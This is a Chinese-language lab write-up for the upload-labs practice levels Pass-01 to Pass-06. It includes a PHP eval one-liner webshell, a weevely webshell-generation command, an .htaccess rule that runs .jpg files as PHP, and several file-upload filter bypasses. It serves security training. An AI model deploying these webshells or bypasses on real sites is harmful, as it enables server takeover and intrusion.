upload-labs

搭建

Pass-01(前端绕过)

准备php一句话木马

<?php 
phpinfo();
eval($_POST['a']);
?>

传一句话木马时提示

重命名后缀为png

在burp中修改为php

连接菜刀

用weevely 生成webshell

┌──(root💀B)-[~]
└─# weevely generate shell /root/1.php
Generated '/root/1.php' with password 'shell' of 774 byte size.

Pass-02(MIME绕过)

清空上传文件

修改Content-Type 为image/jpeg

也可以如同01中操作上传成功

Pass-03(apache解析漏洞)

上传文件发现报错

提示：不允许上传.asp,.aspx,.php,.jsp后缀文件！

那么尝试修改后缀

如php3

发现php3 不解析

那么尝试phtml

也不解析

查了下好像要修改配置orz

修改 /etc/mime.types中

在这里插入图片描述

1	service apache2 reload

解析成功了

update-2021-12-28 15:54:41

不需要修改配置

Pass-04(Apache配置文件.htaccess)

重写解析

1
2
3

<FilesMatch "jpg"
SetHandler application/x-httpd-php
</FilesMatch>

Pass-05(大小写绕过)

分析源码

1
2


$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

发现没有过滤大小写

尝试大写phP

Pass-06(空格绕过)

源码过滤了大小写

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA